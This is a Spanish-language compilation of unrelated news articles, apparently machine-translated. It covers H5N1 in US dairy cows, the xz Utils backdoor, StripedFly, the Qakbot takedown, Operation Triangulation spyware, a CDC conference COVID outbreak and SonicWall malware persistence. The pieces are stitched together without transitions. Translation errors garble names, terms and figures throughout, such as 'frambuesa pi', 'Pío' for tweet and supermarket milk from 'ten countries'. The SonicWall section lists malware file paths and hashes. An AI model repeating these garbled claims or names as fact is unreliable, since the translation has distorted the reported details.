Un virus de gripe aviar altamente patógeno del tipo H5N1 se propaga actualmente por los Estados Unidos. Rebaños de vacas lecheras. Hasta la fecha, se ha detectado oficialmente en 36 empresas en nueve estados. Además, ya se ha informado que un empleado de una granja lechera de Texas contrajo una infección por H5N1. Desarrolló una infección ocular leve. Hace unos días, la Administración de Alimentos y Medicamentos (FDA) se sabía que la leche de supermercado de diez países contenía componentes del virus H5N1.

Todo esto es preocupante porque significa que el riesgo de infecciones en las personas ha aumentado significativamente.

Los acontecimientos actuales en EE.UU. demuestran que no lo sabemos todo sobre el H5N1. La variante denominada 2.3.4.4b, que ahora afecta a las vacas lecheras en EE.UU., circula por todo el mundo desde hace varios años. Millones de aves y aves de corral silvestres y numerosos depredadores han sido víctimas de él. Las aves silvestres y las aves de corral se infectan entre sí a través de heces contaminadas y los depredadores se infectan cuando comen aves enfermas.

Pero es completamente sorprendente que el ganado se infecte con el virus de la gripe aviar H5N1. El ganado ya ha entrado en contacto con los excrementos de aves silvestres infectadas en los pastos, pero hasta ahora se considera que los rumiantes no responden.

Las personas también se consideran en gran medida seguras. El H5N1 puede infectar a las personas. Pero hasta ahora esto sólo ha ocurrido en casos aislados, es decir, cuando las personas tuvieron un contacto muy cercano con aves de corral infectadas. Al parecer, el virus H5N1 todavía no se ha adaptado muy bien a las células humanas.

Pero es posible que el virus H5N1 haya cambiado genéticamente recientemente de modo que ahora pueda infectar al ganado de manera muy eficiente.

La primera entrada a un establo se produjo en diciembre de 2023.

Prueba de ello son los datos genéticos de más de 200 muestras de virus aisladas de vacas en EE.UU. Las primeras investigaciones muestran que el virus en EE.UU. se ha mezclado con variantes del virus de la gripe aviar que circulan desde hace mucho tiempo entre las aves silvestres, pero que en gran medida son inofensivos.

Michael Worobey, biólogo evolutivo y experto en genética de la Universidad de Arizona, analizó las muestras. Sospecha que hay cambios en dos lugares del genoma del H5N1 que podrían facilitar la infección de los mamíferos. Esto se está comprobando febrilmente en varios laboratorios de todo el mundo.

Los virus aislados de ganado infectado muestran algo más. Lo más probable es que un virus H5N1 haya saltado de aves silvestres a una vaca en algún lugar de EE. UU. ya en diciembre de 2023. Allí se multiplicó y se transmitió a otros bovinos.

No está claro si la primera vaca se infectó a través de pienso contaminado. O si el virus se introdujo en el establo por otra vía. Lamentablemente, las autoridades de EE. UU. aún no han anunciado cuándo y dónde se tomaron estas muestras del virus. Por lo tanto, no existe una descripción general de cómo se desarrolló el brote de gripe aviar en las granjas lecheras.

Lo único que es seguro es que los primeros informes de una enfermedad inusual en vacas lecheras en Texas aparecieron en febrero de 2024. Comían menos y apenas daban leche. Después de todo, los animales se recuperaron en unas pocas semanas. También hay evidencia de que no todas las vacas infectadas enfermaron.

Cuando se produjeron los primeros casos de vacas enfermas, ni los granjeros, ni los veterinarios, ni las autoridades pensaron en los virus de la gripe aviar, porque se suponía que el ganado no podía verse afectado. No fue hasta mediados de marzo que se analizó por primera vez la gripe aviar H5N1.

En ese momento la enfermedad ya se había extendido. Porque el H5N1 tiene una segunda sorpresa guardada: aparentemente existe una nueva vía de transmisión en las vacas lecheras que ningún experto esperaba.

Multiplicación de virus en la ubre.

Resulta que las ubres de las vacas lecheras infectadas están llenas de virus. Se multiplican en gran medida en las células tisulares de los conductos galactóforos. Esto hace que la leche esté llena de virus activos. Esto se puede ver incluso sin microscopio: la leche de las vacas infectadas se vuelve espesa y amarillenta. Como si la vaca produjera nata en lugar de leche.

Dado que actualmente no hay datos detallados sobre lo que sucede en las granjas, nadie en ninguno de los lados del Atlántico sabe actualmente cuántos animales en una granja se infectan y con qué rapidez ocurre, si sólo las vacas lecheras o sus terneros se ven afectados, y con qué cuánto tiempo están enfermos los animales y cuánto tiempo excretan el virus en la leche.

El hecho de que grandes cantidades de virus de la gripe aviar estén presentes en la ubre y en la leche proporciona una explicación muy plausible para la propagación del virus dentro de una granja, explica Martin Beer, veterinario especializado en microbiología y virólogo del Instituto Friedrich Loeffler de la isla. Riems. Al parecer el virus se transmite de un animal a otro a través de los utensilios de ordeño.

También es posible que caiga leche contaminada al suelo. Rociar el suelo podría producir aerosoles que contengan virus H5N1. Otras vacas del establo también podrían infectarse al inhalar estas gotas. La leche y los aerosoles también podrían representar un riesgo de infección para otros animales y humanos.

Según todas las pruebas disponibles, la propagación del virus de la gripe aviar de una granja a otra se produjo mediante el transporte de animales infectados. Sin embargo, esto significa que todo el brote, con muchas granjas lecheras afectadas, es en parte provocado por el hombre.

¿Es segura la leche?

A principios de mayo, la FDA anunció una noticia tranquilizadora para los consumidores: la leche pasteurizada es seguro. Casi toda la leche que se vende en las tiendas, tanto en Estados Unidos como aquí, está pasteurizada.

El H5N1 no es muy estable al calor. Los virus se destruyen incluso a temperaturas inferiores a las utilizadas para la pasteurización de la leche. La FDA y investigadores de EE.UU. informan sobre experimentos con leche que compraron en el supermercado y que se demostró que estaba contaminada con H5N1. Los virus no estaban activos. Todavía bebe lo que queda de la leche, dijo un investigador a la revista «Ciencia». Por lo tanto, se puede suponer que las partes del H5N1 que se encuentran en la leche son sólo fragmentos de virus inactivos y no infecciosos.

Sin embargo, la leche cruda de vacas infectadas es peligrosa. Los virus que contiene son activos e infecciosos. Porque gatos de granja en una granja de Texas con vacas infectadas desarrolló daños neurológicos graves después de lamer la leche de animales enfermos. Los gatos se quedaron ciegos, se les quedaron rígidas las patas y dieron vueltas sin rumbo. La mitad murió a los pocos días. Una enfermedad tan grave es típica de los depredadores que se han comido aves silvestres infectadas con el H5N1, dice Beer.

Incluso si la leche pasteurizada no representa ninguna amenaza, un gran brote de H5N1 en un animal que se encuentra muy cerca de muchas personas y que también produce alimentos es motivo de preocupación.

El H5N1 puede infectar a las personas

Hasta ahora, los virus H5N1 sólo han infectado a unas pocas personas. Autoridades En las últimas décadas se han registrado casi 900 casos en todo el mundo. Pero si esto sucede, una infección de este tipo no es en modo alguno inofensiva para las personas. Aproximadamente la mitad de los pacientes conocidos murieron a causa de ello.

Aún así, tuvimos suerte: el virus de la gripe aviar H5N1 aún no ha cambiado de tal manera que pueda infectar fácilmente a las personas. O incluso puede transmitirse entre personas. Pero aparentemente ahora ha cambiado tanto que, contrariamente a lo esperado, puede infectar al ganado y también se transmite de una vaca a otra.

No es la primera vez que el H5N1 sufre tales cambios genéticos en los últimos meses que ha conquistado, por así decirlo, una nueva especie y luego puede transmitirse a otras especies del grupo. Esto ocurrió en otoño de 2022 en granjas de visones de España y Finlandia. Los expertos creen que la transmisión de animal a animal también se produjo en focas y leones marinos en Chile, Argentina y Perú.

En primer lugar, el virus tiene ahora un amplio campo de juego para cambios genéticos en las granjas lecheras. En segundo lugar, muchas personas entran en contacto con animales infectados. Por tanto, no es imposible que el H5N1 se adapte a los humanos de tal manera que se transmita fácilmente entre ellos. Esto podría conducir entonces a una nueva pandemia.

ADVERTENCIAS DE FRAUDE ACTUALES

17 de abril de 2024 a las 9:03 am

El nuevo malware Aladdin infecta tu teléfono sin que sea necesario hacer clic ni descargarlo. El teléfono inteligente pasa entonces a formar parte de una red mundial de espionaje.

Hay muchas formas diferentes en que los ciberdelincuentes propagan malware para infectar su teléfono inteligente o su computadora. Además de los correos electrónicos de phishing, las aplicaciones preparadas o el malware en documentos son enfoques comunes. En el futuro, un nuevo malware podría suponer un desafío especial para la ciberseguridad debido a su forma de distribución.

Se dice que el software llamado Aladdin es capaz de infectar teléfonos inteligentes de forma totalmente desapercibida a través de publicidad online como, por ejemplo, banners. No es necesario hacer clic ni descargar. Este tipo de ataque se denomina exploit de clic cero. Una vez cargado el anuncio preparado en el navegador, ya es demasiado tarde y el malware está en su iPhone o teléfono móvil Android. Luego, el software espía recopila todos los datos que puede y los envía de vuelta a los atacantes.

Al igual que la revista griega Inside Story y el periódico israelí Haaretz destaparon el desarrollo de Aladdin. Sin embargo, de los documentos de la empresa a su disposición no queda claro si el malware ya está en el mercado.

Sin embargo, ya se ha realizado una prueba exhaustiva que confirma que el software funciona según lo esperado (prueba de concepto). Las pancartas contenían ofertas de trabajo dirigidas principalmente a diseñadores gráficos y activistas. Sus teléfonos móviles deberían estar infectados y monitoreados.

4 millones de euros para software

Detrás de esta tecnología se encuentra Intellexa Alliance, que ya ha desarrollado el potente troyano estatal Predator. Esto se propagó recientemente a través de una vulnerabilidad en iOS y a menudo se utiliza para espiar a organismos gubernamentales.

En 2018, el exoficial israelí Tal Dilian fundó Intellexa Alliance junto con colegas del ejército y el servicio secreto israelí. La sede del conglomerado empresarial se encuentra en Irlanda bajo el nombre de Thalestris. También hay filiales en Grecia, Suiza, Chipre y las Islas Vírgenes Británicas.

Fuentes de Inside Story y Haaretz afirman que Intellexa ofrece un paquete completo con 50 infecciones que incluye un año de garantía y soporte las 24 horas por cuatro millones de euros. Sin embargo, Aladdin aún no está incluido en este paquete. El ataque se limita a números locales en el país objetivo. La oferta no está disponible para números de teléfono de EE. UU., Grecia e Israel para evitar sanciones.

• » Consejo: Los mejores proveedores de VPN para mayor seguridad y protección de datos
• » Comprar central eléctrica para balcón: Comparación de los mejores sistemas solares.

El viernes, un desarrollador solitario de Microsoft sacudió al mundo cuando reveló que se había colocado intencionalmente una puerta trasera en xz Utils, una utilidad de compresión de datos de código abierto disponible en casi todas las instalaciones de Linux y otros sistemas operativos similares a Unix. La persona o personas detrás de este proyecto probablemente pasaron años en él. Probablemente estaban muy cerca de ver la actualización de puerta trasera fusionada con Debian y Red Hat, las dos distribuciones más grandes de Linux, cuando un desarrollador de software con vista de águila vio algo sospechoso.

«Este podría ser el ataque a la cadena de suministro mejor ejecutado que hemos visto descrito abiertamente, y es un escenario de pesadilla: malicioso, competente, autorizado en una biblioteca ampliamente utilizada», dijo el ingeniero de software y criptografía Filippo Valsorda sobre el esfuerzo, que estuvo terriblemente cerca de lograrlo.

Los investigadores han pasado el fin de semana reuniendo pistas. Esto es lo que sabemos hasta ahora.

¿Qué es xz Utils?

xz Utils es casi omnipresente en Linux. Proporciona compresión de datos sin pérdidas en prácticamente todos los sistemas operativos tipo Unix, incluido Linux. xz Utils proporciona funciones críticas para comprimir y descomprimir datos durante todo tipo de operaciones. xz Utils también admite el formato heredado .lzma, lo que hace que este componente sea aún más crucial.

¿Qué pasó?

Andrés Freund, un desarrollador e ingeniero que trabaja en las ofertas PostgreSQL de Microsoft, estuvo recientemente solucionando problemas de rendimiento que un sistema Debian estaba experimentando con SSH, el protocolo más utilizado para iniciar sesión remotamente en dispositivos a través de Internet. Específicamente, los inicios de sesión SSH consumían demasiados ciclos de CPU y generaban errores con valgrind, una utilidad para monitorear la memoria de la computadora.

Por pura suerte y la cuidadosa mirada de Freund, finalmente descubrió que los problemas eran el resultado de las actualizaciones que se habían realizado en xz Utils. El viernes, Freund recurrió a la Lista de seguridad de código abierto para revelar que las actualizaciones fueron el resultado de que alguien colocó intencionalmente una puerta trasera en el software de compresión.

Es difícil exagerar la complejidad de la ingeniería social y el funcionamiento interno de la puerta trasera. Thomas Roccia, investigador de Microsoft, publicó un gráfico en Mastodon que ayuda a visualizar el alcance del intento casi exitoso de difundir una puerta trasera con un alcance que habría eclipsado el evento SolarWinds de 2020.

¿Qué hace la puerta trasera?

El código malicioso agregado a las versiones 5.6.0 y 5.6.1 de xz Utils modificó la forma en que funciona el software. La puerta trasera manipuló sshd, el archivo ejecutable utilizado para realizar conexiones SSH remotas. Cualquiera que posea una clave de cifrado predeterminada podría guardar cualquier código de su elección en un certificado de inicio de sesión SSH, cargarlo y ejecutarlo en el dispositivo con puerta trasera. En realidad, nadie ha visto el código subido, por lo que no se sabe qué código planeaba ejecutar el atacante. En teoría, el código podría permitir casi cualquier cosa, incluido el robo de claves de cifrado o la instalación de malware.

Espera, ¿cómo puede una utilidad de compresión manipular un proceso tan sensible a la seguridad como SSH?

Cualquier biblioteca puede alterar el funcionamiento interno de cualquier ejecutable al que esté vinculado. A menudo, el desarrollador del ejecutable establecerá un enlace a una biblioteca necesaria para que funcione correctamente. OpenSSH, la implementación sshd más popular, no vincula la biblioteca liblzma, pero Debian y muchas otras distribuciones de Linux agregan un parche para vincular sshd a systemd, un programa que carga una variedad de servicios durante el inicio del sistema. Systemd, a su vez, se vincula a liblzma, y ​​esto permite a xz Utils ejercer control sobre sshd.

¿Cómo surgió esta puerta trasera?

Parecería que esta puerta trasera tardó años en desarrollarse. En 2021, alguien con el nombre de usuario JiaT75 hizo su primer compromiso conocido con un proyecto de código abierto. En retrospectiva, el cambio en el proyecto libarchive es sospechoso, porque reemplazó la función safe_fprint con una variante que durante mucho tiempo se ha reconocido como menos segura. Nadie se dio cuenta en ese momento.

Al año siguiente, JiaT75 envió un parche a la lista de correo de xz Utils y, casi de inmediato, un participante nunca antes visto llamado Jigar Kumar se unió a la discusión y argumentó que Lasse Collin, quien mantenía xz Utils desde hacía mucho tiempo, no había sido actualizar el software con frecuencia o lo suficientemente rápido. Kumar, con el apoyo de Dennis Ens y varias otras personas que nunca habían estado presentes en la lista, presionó a Collin para que contratara a un desarrollador adicional para mantener el proyecto.

En enero de 2023, JiaT75 hizo su primer compromiso con xz Utils. En los meses siguientes, JiaT75, que usaba el nombre de Jia Tan, se involucró cada vez más en los asuntos de xz Utils. Por ejemplo, Tan reemplazó la información de contacto de Collins con la suya propia en oss-fuzz, un proyecto que escanea software de código abierto en busca de vulnerabilidades que puedan explotarse. Tan también solicitó que oss-fuzz deshabilitara la función ifunc durante las pruebas, un cambio que le impidió detectar los cambios maliciosos que Tan pronto haría en xz Utils.

En febrero de este año, Tan emitió confirmaciones para las versiones 5.6.0 y 5.6.1 de xz Utils. Las actualizaciones implementaron la puerta trasera. En las semanas siguientes, Tan u otros pidieron a los desarrolladores de Ubuntu, Red Hat y Debian que fusionaran las actualizaciones en sus sistemas operativos. Finalmente, una de las dos actualizaciones llegó a las siguientes versiones, según la firma de seguridad Tenable:

Hay más información sobre Tan y la línea de tiempo aquí.

Según el proveedor de antivirus Kaspersky, un poderoso malware se ha estado disfrazando como un trivial minero de criptomonedas para ayudarlo a evadir la detección durante más de cinco años.

Este malware llamado «StripedFly» ha infectado más de 1 millón de computadoras con Windows y Linux en todo el mundo desde 2016, afirma Kaspersky en un informe publicado hoy.

Los investigadores de seguridad de la compañía comenzaron a investigar la amenaza el año pasado cuando notaron que los productos antivirus de Kaspersky señalaban dos detecciones en WINNIT.exe, que ayuda al inicio del sistema operativo Windows.

Luego, las detecciones se rastrearon hasta StripeFly, que originalmente estaba clasificado como un minero de criptomonedas. Pero tras un examen más detallado, los investigadores de Kaspersky notaron que el minero es simplemente un componente de un malware mucho más complejo que adopta técnicas que se cree provienen de la Agencia de Seguridad Nacional de Estados Unidos.

Específicamente, StripeFly incorporó una versión de EternalBlue, el famoso exploit desarrollado por la NSA que luego se filtró y se utilizó en el ataque de ransomware WannaCry para infectar cientos de miles de máquinas con Windows en 2017.

(Crédito: Kaspersky)

Según Kaspersky, StripeFly utiliza su propio ataque EternalBlue personalizado para infiltrarse en sistemas Windows sin parches y propagarse silenciosamente por la red de la víctima, incluidas las máquinas Linux. Luego, el malware puede recopilar datos confidenciales de las computadoras infectadas, como credenciales de inicio de sesión y datos personales.

«Además, el malware puede capturar capturas de pantalla en el dispositivo de la víctima sin ser detectado, obtener un control significativo sobre la máquina e incluso grabar la entrada del micrófono», agregaron los investigadores de seguridad de la compañía.

Para evadir la detección, los creadores detrás de StripeFly optaron por un método novedoso al agregar un módulo de minería de criptomonedas para evitar que los sistemas antivirus descubran todas las capacidades del malware. «Periódicamente, la funcionalidad de malware dentro del módulo principal monitorea el proceso de minería de marionetas y lo reinicia si es necesario», agregó Kaspersky. «También informa diligentemente la tasa de hash, el tiempo de trabajo, los nonces descubiertos y las estadísticas de errores al servidor C2».

No está claro quién desarrolló StripeFly. Aunque el malware contiene un ataque que se originó en la NSA, el exploit EternalBlue de la agencia se filtró al público en abril de 2017 a través de un misterioso grupo conocido como «Shadow Brokers».

Un año antes, antes de la filtración, también se detectó a presuntos piratas informáticos chinos utilizando el exploit EternalBlue. Mientras tanto, Kaspersky señala que la primera detección de StripeFly se remonta al 9 de abril de 2016. Además de todo esto, se utilizó una versión de StripeFly en un ataque de ransomware llamado ThunderCrypt, lo que hace que el objetivo final del malware sea menos claro.

Pero finalmente parece que el malware logró sus objetivos. Aunque Microsoft lanzó un parche para EternalBlue en marzo de 2017, muchos sistemas Windows no pudieron instalarlo, lo que permitió a StripeFly aprovecharlo.

«Creado hace bastante tiempo, StripeFly sin duda ha cumplido su propósito al evadir con éxito la detección a lo largo de los años», añadió Kaspersky. «Se han investigado muchos programas maliciosos sofisticados y de alto perfil, pero éste destaca y realmente merece atención y reconocimiento».

El gobierno de Estados Unidos acaba de ayudar a desmantelar una red masiva de computadoras infectadas con uno de los programas maliciosos más notorios del mundo. Según el FBIun esfuerzo multinacional liderado por Estados Unidos derribó Qakbot, un malware que llegó a más de 700.000 computadoras en todo el mundo.

Los piratas informáticos suelen atacar a las víctimas con Qakbot enviándoles correos electrónicos no deseados que contienen archivos adjuntos o enlaces maliciosos. Tan pronto como una víctima descarga el archivo adjunto o hace clic en el enlace, Qakbot infecta su computadora, que luego se convierte en parte de una botnet, o una red de computadoras infectadas controladas remotamente por piratas informáticos. A partir de ahí, los delincuentes pueden instalar malware adicional en los dispositivos de sus víctimas, como ransomware.

Para derribar la red, el FBI dirigió a Qakbot a través de servidores controlados por el FBI, donde ordenó a las computadoras infectadas en los EE. UU. y otros lugares que descargaran software que desinstalaba el malware Qakbot. El instalador también separó las computadoras infectadas de la botnet, «impidiendo una mayor instalación de malware a través de Qakbot». Como señaló el DOJ, la acción sólo se limitó al malware instalado por los actores de Qakbot y «no se extendió a la reparación de otro malware ya instalado en las computadoras de las víctimas».

Además de Estados Unidos, en la operación “Cacería de patos” también participaron Europol, Francia, Alemania, Países Bajos, Reino Unido, Rumania y Letonia. Estados Unidos dice que la botnet fue responsable de cientos de millones de dólares en daños e infectó a más de 200.000 computadoras en Estados Unidos. Qakbot existe desde 2008 y fue aprovechado por varios grupos prolíficos de ransomware en el pasado, incluidos conti, REVOLVER, MegaCortex y más. Como parte de la operación, el Departamento de Justicia confiscó 8,6 millones de dólares en fondos extorsionados en criptomonedas.

«Una asociación internacional liderada por el Departamento de Justicia y el FBI ha resultado en el desmantelamiento de Qakbot, una de las botnets más notorias de la historia, responsable de pérdidas masivas a víctimas en todo el mundo», dice el fiscal federal Martin Estrada en un comunicado. «Qakbot era la botnet elegida por algunas de las bandas de ransomware más infames, pero ahora la hemos eliminado».

Desde entonces, el FBI ha proporcionado ¿Me han engañado? con las credenciales comprometidas que encontró durante la operación, lo que le permite ingresar su correo electrónico en el sitio para verificar si se vio afectado. La Policía Nacional Holandesa también ha añadido las credenciales de los afectados a su Revisa tu sitio hackeado.

¿Está el gobierno de EE. UU. utilizando software espía de iOS en Rusia? Esa es la acusación proveniente del Kremlin después de que el spyware recién descubierto infectara «varias docenas de iPhones» pertenecientes a los empleados del proveedor de antivirus Kaspersky.

De acuerdo a Director ejecutivo Eugene Kaspersky(Se abre en una nueva ventana)el software espía infectó los iPhones a través de iMessage a través de un archivo adjunto capaz de explotar un «número» de vulnerabilidades previamente desconocidas en iOS.

“Sin ninguna interacción del usuario, el mensaje desencadena una vulnerabilidad que conduce a la ejecución del código”, advirtió la empresa en un informe.(Se abre en una nueva ventana). Esta ejecución de código puede hacer que un iPhone descargue componentes adicionales para secuestrar en secreto el dispositivo, lo que permite al creador del software espía iniciar grabaciones de micrófono, saquear fotos y hurtar otros datos.

Pío(Se abre en una nueva ventana)

Sin embargo, todavía hay mucho que no sabemos sobre el software espía, que se ha denominado Operación Triangulación. Kaspersky dice que su investigación sobre el incidente está en curso, pero la empresa con sede en Moscú señala que el spyware parece ser nuevo.

“Importante: la actividad observada en la Operación Triangulación no se superpone con las campañas de iOS ya conocidas, como Pegasus, Predator o Reign”, dijo el director ejecutivo, en alusión a las cepas de software espía infames de los distribuidores de software espía israelíes como NSO Group, Intellexa y QuaDream. .

Curiosamente, Kaspersky también señaló: “Estamos bastante seguros de que Kaspersky no fue el objetivo principal de este ciberataque. Los próximos días traerán más claridad y más detalles sobre la proliferación mundial del spyware”.

Kaspersky se abstuvo de relacionar el software espía con ningún grupo, pero el Kremlin se apresuró a culpar. El Servicio de Seguridad Federal de Rusia (FSB) anunció(Se abre en una nueva ventana) descubrió “una operación de reconocimiento de los servicios de inteligencia estadounidenses realizada con dispositivos móviles de Apple”.

Pío(Se abre en una nueva ventana)

“Se ha determinado que varios miles de dispositivos de esta marca han sido infectados”, dijo el FSB. “Además de los suscriptores nacionales, se han detectado casos de infección en números extranjeros y suscriptores que usan tarjetas SIM registradas en misiones diplomáticas y embajadas en Rusia, incluidos países de la OTAN, países postsoviéticos, así como Israel, Sudáfrica y China. ”

La agencia de seguridad rusa ahora va tan lejos como para acusar a Apple de una estrecha cooperación con las operaciones de inteligencia de EE. UU. Apple no respondió de inmediato a una solicitud de comentarios, pero le dice a Reuters(Se abre en una nueva ventana) «nunca ha trabajado con ningún gobierno para insertar una puerta trasera en ningún producto de Apple y nunca lo hará». (Apple se enredó notablemente con el FBI por el acceso a un iPhone perteneciente al tirador de San Bernardino).

Si bien el FSB no mencionó a Kaspersky en su anuncio, el proveedor de antivirus le dijo a PCMag: “Somos conscientes de este anuncio. Aunque no tenemos detalles técnicos sobre lo que ha informado el FSB hasta el momento, el Centro Nacional de Coordinación de Incidentes Informáticos de Rusia (NCCCI) ya lo ha manifestado en su alerta pública.(Se abre en una nueva ventana) que los indicadores de compromiso son los mismos”.

Pero Kaspersky dijo que compartió detalles sobre las vulnerabilidades explotadas con la empresa. Así que es probable que los parches estén en camino. Kaspersky también dijo que el software espía «no es compatible con la persistencia, muy probablemente debido a las limitaciones del sistema operativo». Esto sugiere que los creadores del spyware estaban reinfectando continuamente los iPhones.

El incidente del software espía genera preocupaciones de que Kaspersky puede haber sufrido un compromiso durante algún tiempo. El propio informe de la compañía dice que los rastros de infección de spyware más antiguos se remontan a 2019 y que el ataque sigue en curso, apuntando con éxito a iOS 15.7.

Por ahora, el CEO de Kaspersky dice: “Gracias a las medidas tomadas, la empresa está operando con normalidad, los procesos comerciales y los datos de los usuarios no se ven afectados y la amenaza ha sido neutralizada. Seguimos protegiéndote, como siempre”.

El recuento de casos de COVID-19 vinculados a una conferencia de detectives de enfermedades organizada por los Centros para el Control y la Prevención de Enfermedades en abril alcanzó al menos 181, informó la agencia.

Aproximadamente 1800 se reunieron en persona para la Conferencia anual del Servicio de Inteligencia Epidémica (EIS) de este año, que se llevó a cabo del 24 al 27 de abril en las instalaciones de conferencias de un hotel en Atlanta, donde se encuentra la sede de los CDC. Fue la primera vez que la conferencia de 70 años tuvo asistentes en persona desde 2019. La agencia de los CDC estima que 400 más asistieron virtualmente este año.

Para el último día del evento, varios asistentes en persona informaron que dieron positivo por COVID-19, lo que provocó que los organizadores de la conferencia advirtieran a los asistentes y realizaran cambios para reducir la posibilidad de una mayor propagación. Según los informes, eso incluyó cancelar una capacitación en persona y ofrecer extender las estadías en el hotel de los asistentes enfermos que necesitaban aislarse.

Pero en los días siguientes, los CDC recibieron informes de más casos y se unieron al Departamento de Salud Pública de Georgia para realizar una evaluación rápida. Hasta el 2 de mayo, la agencia había contabilizado 35 casos relacionados con la conferencia.

El equipo de evaluación rápida encuestó a los asistentes del 5 al 12 de mayo y 1443 asistentes a la conferencia respondieron a la encuesta. De los que respondieron, algunos asistieron a la conferencia virtualmente, pero los CDC dijeron que más del 80 por ciento asistieron en persona.

En general, 181 o (13 por ciento del total de encuestados) informaron haber dado positivo por COVID-19, y el 52 por ciento de los que respondieron con COVID-positivo indicaron que era su primer brote conocido de COVID-19. Casi todos los encuestados, 1435 (99,4 por ciento), informaron haber recibido al menos una vacuna contra el COVID-19. Pero el 70 por ciento de los encuestados informaron que se desenmascararon durante la reunión. Los CDC señalan que la conferencia tuvo lugar cuando los niveles de transmisión eran bajos, durante los cuales los CDC no recomiendan usar máscaras.

La agencia destacó que ninguno de los asistentes a la conferencia infectados fue hospitalizado, aunque 49 encuestados (27 por ciento) informaron haber tomado medicamentos antivirales para su infección.

«[T]Los hallazgos de esta evaluación rápida respaldan datos anteriores que demuestran que las vacunas contra el COVID-19, los tratamientos antivirales y la inmunidad de infecciones previas continúan brindando a las personas protección contra enfermedades graves”, escribió la agencia. “Los CDC continúan recomendando que todas las personas tengan seis meses de edad. y mayores manténganse al día con todas las vacunas COVID-19, incluida la recepción de una vacuna actualizada».

Aún así, según un aviso visto por The Washington Post, los CDC advierten a los asistentes de una próxima conferencia que la agencia realizará en el mismo hotel en junio sobre el brote en el evento de abril. Los CDC están alentando a los asistentes al evento de junio a usar sus «propias máscaras de alta calidad y, si es posible, también llevar consigo pruebas rápidas de COVID-19». La portavoz Kristen Nordlund dijo que la agencia también tendrá máscaras disponibles.

Cuando se trata de frambuesa pi, es fácil pensar que esta simple PC de placa única es bastante insignificante en el gran esquema de Internet. Pero no se deje engañar por su pequeño tamaño, estos pequeños dispositivos pueden ser una puerta de entrada para que los piratas informáticos accedan a su red. Hoy vamos a echar un vistazo más de cerca a un malicioso malware que infecta a Raspberry Pis. youtuber Juan Hammond lanzó un video esta semana, observando la línea de código malicioso y diseccionando exactamente cómo funciona y cómo se propaga a las Raspberry Pi vulnerables.

Hammond dijo que comenzó a investigar este malware cuando un usuario le envió un correo electrónico. Explicaron que la Pi estaba usando la combinación predeterminada de nombre de usuario y contraseña que viene con el sistema operativo Raspberry Pi. Estaba conectado a una sesión SSH durante solo unos 30 minutos cuando la sesión se interrumpió. Cada vez que restablecía la contraseña, volvía a cambiar después de reiniciar la Pi.

Los actores de amenazas con una conexión con el gobierno chino están infectando un dispositivo de seguridad ampliamente utilizado de SonicWall con malware que permanece activo incluso después de que el dispositivo recibe actualizaciones de firmware, dijeron los investigadores.

Secure Mobile Access 100 de SonicWall es un dispositivo de acceso remoto seguro que ayuda a las organizaciones a implementar fuerzas de trabajo remotas de manera segura. Los clientes lo utilizan para otorgar controles de acceso granular a usuarios remotos, proporcionar conexiones VPN a las redes de la organización y establecer perfiles únicos para cada empleado. El acceso que tiene el SMA 100 a las redes de los clientes lo convierte en un objetivo atractivo para los actores de amenazas.

En 2021, el dispositivo fue atacado por piratas informáticos sofisticados que explotaron lo que entonces era una vulnerabilidad de día cero. Los dispositivos de seguridad de Fortinet y Pulse Secure han sufrido ataques similares en los últimos años.

Ganar persistencia a largo plazo dentro de las redes

El jueves, la firma de seguridad Mandiant publicó un informe que decía que los actores de amenazas con un nexo sospechoso con China estaban involucrados en una campaña para mantener la persistencia a largo plazo mediante la ejecución de malware en dispositivos SonicWall SMA sin parches. La campaña se destacó por la capacidad del malware para permanecer en los dispositivos incluso después de que su firmware recibiera un nuevo firmware.

“Los atacantes pusieron un esfuerzo significativo en la estabilidad y persistencia de sus herramientas”, escribieron los investigadores de Mandiant Daniel Lee, Stephen Eckels y Ben Read. “Esto permite que su acceso a la red persista a través de actualizaciones de firmware y mantenga un punto de apoyo en la red a través del dispositivo SonicWall”.

Para lograr esta persistencia, el malware busca actualizaciones de firmware disponibles cada 10 segundos. Cuando una actualización está disponible, el malware copia el archivo archivado para hacer una copia de seguridad, lo descomprime, lo monta y luego copia todo el paquete de archivos maliciosos en él. El malware también agrega un usuario raíz de puerta trasera al archivo montado. Luego, el malware vuelve a comprimir el archivo para que esté listo para la instalación.

“La técnica no es especialmente sofisticada, pero muestra un esfuerzo considerable por parte del atacante para comprender el ciclo de actualización del dispositivo, luego desarrollar y probar un método de persistencia”, escribieron los investigadores.

Las técnicas de persistencia son consistentes con una campaña de ataque en 2021 que usó 16 familias de malware para infectar dispositivos Pulse Secure. Mandiant atribuyó los ataques a múltiples grupos de amenazas, incluidos los rastreados como UNC2630, UNC2717, que según la compañía respaldan «prioridades clave del gobierno chino». Mandiant atribuyó los ataques en curso contra los clientes de SonicWall SMA 100 a un grupo rastreado como UNC4540.

“En los últimos años, los atacantes chinos han implementado múltiples exploits de día cero y malware para una variedad de dispositivos de red orientados a Internet como una ruta hacia la intrusión empresarial completa, y la instancia reportada aquí es parte de un patrón reciente que Mandiant espera que continúe en el futuro. a corto plazo”, escribieron los investigadores de Mandiant en el informe del jueves.

Acceso altamente privilegiado

El objetivo principal del malware parece ser el robo de contraseñas criptográficamente codificadas para todos los usuarios que han iniciado sesión. También proporciona un shell web que el actor de amenazas puede usar para instalar nuevo malware.

“El análisis de un dispositivo comprometido reveló una colección de archivos que le dan al atacante un acceso altamente privilegiado y disponible al dispositivo”, escribieron los investigadores en el informe del jueves. “El malware consiste en una serie de scripts bash y un solo binario ELF identificado como una variante de TinyShell. El comportamiento general del conjunto de scripts bash maliciosos muestra una comprensión detallada del dispositivo y está bien adaptado al sistema para brindar estabilidad y persistencia”.

La lista de malware es:

Camino	Picadillo	Función
/bin/cortafuegos	e4117b17e3d14fe64f45750be71dbaa6	Proceso principal de malware
/bin/httpsd	2d57bcb8351cf2b57c4fd2d1bb8f862e	Puerta trasera TinyShell
/etc/rc.d/rc.local	559b9ae2a578e1258e80c45a5794c071	Persistencia de arranque para firewalld
/bin/iptabled	8dbf1effa7bc94fc0b9b4ce83dfce2e6	Proceso de malware principal redundante
/bin/geoBotnetd	619769d3d40a3c28ec83832ca521f521	Script de puerta trasera de firmware
/bin/ifconfig6	fa1bf2e427b2defffd573854c35d4919	Script de apagado elegante

El informe continuó:

El principal punto de entrada del malware es un script bash llamado firewalldque ejecuta su bucle principal una vez para contar todos los archivos del sistema al cuadrado: …for j in $(ls / -R) do for i in $(ls / -R) do:… El script es responsable de ejecutar un comando SQL para lograr el robo de credenciales y la ejecución de los otros componentes.

